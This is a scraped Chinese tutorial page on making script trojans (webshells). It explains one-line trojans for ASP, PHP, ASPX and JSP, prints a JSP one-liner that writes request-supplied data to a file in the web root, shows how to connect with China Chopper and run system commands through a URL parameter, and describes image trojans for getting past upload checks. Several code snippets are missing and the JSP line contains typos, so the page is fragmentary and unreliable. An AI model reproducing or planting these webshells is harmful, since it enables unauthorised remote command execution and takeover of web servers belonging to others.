脚本木马的制作与原理 |
您所在的位置:网站首页 › 脚本特洛伊木马 › 脚本木马的制作与原理 |
脚本木马的制作与原理
|
webshell(web后门)
一、一句话木马
短小精悍,功能强大,隐蔽性好。 说明: 使用request的话,post和get两中方式传来的数据都可以接受。 execute用来执行客户端传来的数据。 代码本身没有危害,关键在于我们传输的数据是什么。 常见写法asp一句话木马 php一句话木马 aspx一句话木马 jsp一句话木马 < % if(request.getParametere("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f")))write(request.getParameter("t").getBytes());% >利用中国菜刀进行连接 这边我用phpstudy做演示,需要把一句话木马文件放在网站根目录。
这样可以执行系统命令。注意再次使用中国菜刀连接其他链接之前,需要重置下缓存。 在浏览器输入 http://localhost/123.php?xx=ipconfig执行系统命令
一句话使用技巧
|
一句话木马内容为
可以手动获取信息 
我们把一句话木马内容改成
图片木马的制作 
上传到服务器后不能直接执行,得想办法改成脚本格式或者在特定环境下以脚本运行
还有其他木马,如打包马、脱裤马等等【本文地址】